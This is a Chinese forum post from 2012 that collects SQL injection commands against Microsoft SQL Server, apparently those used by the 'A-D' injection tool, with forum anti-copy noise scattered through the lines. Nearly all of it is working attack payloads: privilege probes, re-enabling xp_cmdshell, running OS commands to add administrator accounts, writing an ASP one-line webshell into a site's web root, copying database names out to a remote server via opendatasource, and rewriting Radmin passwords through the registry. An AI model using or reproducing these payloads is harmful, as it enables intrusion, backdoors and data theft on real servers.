找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1944|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
9 e: T4 u& X* {" ?4 x. u& ~* J: ]//看看是什么权限的5 p. \5 ]6 ]. L0 {
and 1=(Select IS_MEMBER('db_owner'))
, V' H# p3 F) @4 b  _- zAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
8 q% i, `# a# @& c2 ]0 A6 t
- M. ?9 e, I. D+ q  S//检测是否有读取某数据库的权限
. ^( B0 {; f' g! q' e" l6 mand 1= (Select HAS_DBACCESS('master'))
, ^8 T+ A  m, ]And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
7 A3 l- n/ D" F1 R/ |6 H! s
6 C7 b: l( A! z8 p! y4 m
) \! F$ @9 u" |+ R1 b# l5 r数字类型+ m+ p4 i7 Y( [5 r2 g6 M6 W
and char(124)%2Buser%2Bchar(124)=01 x: L; g' v- N: J1 h1 ?
: S* M2 O3 v0 `+ _& w2 j( Q+ l& X
字符类型# a9 R0 k* R3 }6 _( c  H4 Y
' and char(124)%2Buser%2Bchar(124)=0 and ''='
" e, E4 U* B5 I  W: o+ F3 i# C. O! A8 L- j
搜索类型
: D5 j" W5 p5 W# S- ?' and char(124)%2Buser%2Bchar(124)=0 and '%'='# L7 l8 ?* g7 n$ A' @7 a
2 M# M3 w& F/ _! i* w0 I
爆用户名5 x5 b% z* @5 K9 E  z0 A4 D
and user>0- p  W. @& [! D1 \* w1 x
' and user>0 and ''='' D/ ?; n1 d6 v  i' o
+ Z, _* L0 }0 \$ \7 p0 s
检测是否为SA权限
  }: r0 w3 B* Z$ sand 1=(select IS_SRVROLEMEMBER('sysadmin'));--  \0 I+ q. R' i% }: o# x! t  I
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
4 ^& W4 P1 p: l4 r& u6 _1 R" p! s! v) K1 e5 E
检测是不是MSSQL数据库
, |/ A0 N) j6 ]- A* q; S% c+ oand exists (select * from sysobjects);--
4 d. W  L7 Y" a$ `
& y8 o. d2 ]7 N检测是否支持多行- x# M  C6 c  n2 d6 [
;declare @d int;-- " K% p+ @# u6 K8 f9 h& U
8 j7 Q2 E! C6 [1 N- j) m. |
恢复 xp_cmdshell
% Q3 B9 n, n/ i$ G;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
! O8 D% U$ X% m* f& @% ?/ `5 `: c( h" i) q$ J3 H& H; ~3 [* i
" r, l' B' I$ S5 I3 ]6 r/ {
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
9 u; }1 m" E# R* o1 O4 U0 U7 k4 O/ D
//-----------------------
, n5 H; p4 F* [//      执行命令! j$ V+ h8 e2 R- n6 \( b" |
//-----------------------
0 |3 c  X0 O6 N* c" O首先开启沙盘模式:2 ^* w% C* S. k" I: L& g) s( [
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
% i- _. |- W, F( l3 c- K7 R  h
% w8 W% O1 j: U' B# g然后利用jet.oledb执行系统命令. V, @- r' O3 s2 L. z0 ^
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')$ e; w6 R. G$ {) W4 d( O

" l8 S3 j4 j1 s执行命令! N  Z( P# L. N" o' ~3 P5 _
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--* |2 R5 m; {) L( R! v$ G

' J* S3 y' }% n; |8 }0 oEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
3 ^6 Q: K3 h* O8 _' f( Y- I$ L' Y$ ]5 _, @9 E% i
判断xp_cmdshell扩展存储过程是否存在:1 X, m4 W$ m: B6 V+ U* t' Z1 `
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
; i1 p1 M5 P8 |1 t. |' l8 R% r1 V) e/ p0 ?3 d7 N
写注册表! C8 m, Y- C9 G4 r
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1& U, z8 C/ i7 V& b( x
7 Q3 t5 }$ O8 N; K! D' p
REG_SZ
5 N9 v1 h3 ]; D" I# Y& z& Z! i7 q. u& ]1 B0 t
读注册表
: z0 e  Y) j. `5 v2 Y3 |! Eexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'% a) e- m6 J7 d* h& M
) w7 \/ J' ^9 j
读取目录内容
* P: |: A: H: g% F3 L7 }5 Mexec master..xp_dirtree 'c:\winnt\system32\',1,1- S2 d. x+ d) z* j/ R" C# ?/ k

( K) g( t: H* v6 v; E- [7 i7 Z$ W6 S6 Y# ]
数据库备份
8 O" t) J( T  X( {& A* y0 pbackup database pubs to disk = 'c:\123.bak'
: e% e) `6 d7 H# E) z1 {
7 }  O$ Y8 w- D4 W  ]//爆出长度) g: ^- `8 T( m
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--- R4 [5 n! I& Y/ n2 }' }5 G$ h  C

9 B& s( l/ Z' _/ r: |' W( \
) ~1 r2 N  Z, X; e
2 A  T" ~& i6 H& d3 ^9 A更改sa口令方法:用sql综合利用工具连接后,执行命令:
2 C. P8 E( Y0 x& r% ]6 lexec sp_password NULL,'新密码','sa'3 P; Z. j5 T: `% e
3 J3 K1 [8 _) X% v5 p
添加和删除一个SA权限的用户test:
4 N3 w. f+ X5 E$ R- t4 Sexec master.dbo.sp_addlogin test,ptlove
2 V3 G$ V3 f% Cexec master.dbo.sp_addsrvrolemember test,sysadmin) s- Y! y: P8 h

/ o0 {9 E* _9 a5 r( x8 D删除扩展存储过过程xp_cmdshell的语句:
4 L: M' l- i  lexec sp_dropextendedproc 'xp_cmdshell'
$ O6 j$ O. ^" M: ?
( f& L2 z6 P0 X" k% z添加扩展存储过过程
; ?& @2 Q+ ?: Q/ L/ ~EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' 0 z* j8 y8 s9 }, [9 Q4 }, I
GRANT exec On xp_proxiedadata TO public
! \. {( Y+ {6 ?. \0 I# w) e7 E5 Y- z. Z  I
) Q! ?- t6 s) w5 X# S- T
停掉或激活某个服务。
4 x; Z- j3 ~6 U: Y9 c$ l- k. J4 v
: n+ E* Z2 i  z( e8 N7 x1 A2 aexec master..xp_servicecontrol 'stop','schedule'. L4 z4 t& X9 \% Q
exec master..xp_servicecontrol 'start','schedule'
% l/ n) w$ c" e1 b9 k
  a$ W3 O  R- xdbo.xp_subdirs) J* u) y# h- I6 ?) U

. k: y9 c8 D: W# K5 C2 N# d+ [只列某个目录下的子目录。
/ E. v# B- `4 O& i* o. {! y: Lxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'6 E* A' Y( T! Y1 m- c( N

  p" Y8 h9 d5 s8 M8 m' }dbo.xp_makecab7 J) B9 Z; z8 C4 Y, v) c3 E, J' F

9 b! j! a) K  _$ t0 Q将目标多个档案压缩到某个目标档案之内。. d0 e, }; O* l9 a8 T) T. D7 q: i
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。& |$ B( f9 O+ r# o  c8 }

7 j& ~# r3 G* idbo.xp_makecab" L$ Q# Y' }- H+ \
'c:\test.cab','mszip',1,
& r7 S  ^( j% |, O0 @'C:\Inetpub\wwwroot\SQLInject\login.asp',% C  H* M3 a* l
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
/ S  L2 S6 u" [; j
# _% h$ w' J% Q8 gxp_terminate_process
  g( }" Q, t) n& l/ i' I3 t7 y: E* k( B: P# c( j/ V% B7 u/ u
停掉某个执行中的程序,但赋予的参数是 Process ID。5 h/ T' j. h! W( P6 v: q
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
; e$ ~' N1 A  X5 o" d9 S- X
+ W! p# ?4 U# R  c4 f) mxp_terminate_process 2484
% b$ j9 ?- a, Z# q. O0 g0 m" r; B4 l8 x( [& P
xp_unpackcab& j( w% i2 v. r: l) O! D

+ u$ Y4 e' ~, M解开压缩档。
# o- V6 k7 F' N4 S' p0 g  L( ^
0 P8 p0 J) j4 bxp_unpackcab 'c:\test.cab','c:\temp',1! v4 `1 C2 |: z4 [4 s

4 z# w$ T. p7 }/ g9 A9 M
' t5 F) d8 T- q! |3 _: D某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234  Y4 R  r: ]4 P" _* h
1 J3 Z6 _( r' f
create database lcx;
3 U" z2 V7 r' q) b# bCreate TABLE ku(name nvarchar(256) null);; I' [6 k4 ^/ I( z( g
Create TABLE biao(id int NULL,name nvarchar(256) null);
$ R% ~  T$ a6 H/ R! A
+ p7 v9 _/ {) n- g7 C//得到数据库名) E% X. U" q# ?
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
, s0 n) L& v7 V9 C
/ v1 L' N" U* r  a/ B" N% _
# x, B5 z" k/ ?) q& f" |//在Master中创建表,看看权限怎样
7 B& g$ c3 m/ {; C/ f$ |Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
5 k' E8 H# g! i" O9 b) ~4 F8 B: ?' O' b
用 sp_makewebtask直接在web目录里写入一句话马:/ U& `& c, R1 o- p8 h
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--9 ~" F" q, K! C0 U! \

  n. x6 n# b' @" Y//更新表内容; _2 Q! E, e- E2 ^. t( I& _
Update films SET kind = 'Dramatic' Where id = 123' I9 k& g( V, j9 J* b
: V* a( M8 z9 g6 F* ~3 d
//删除内容3 D. f% d' m. \2 @# N
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表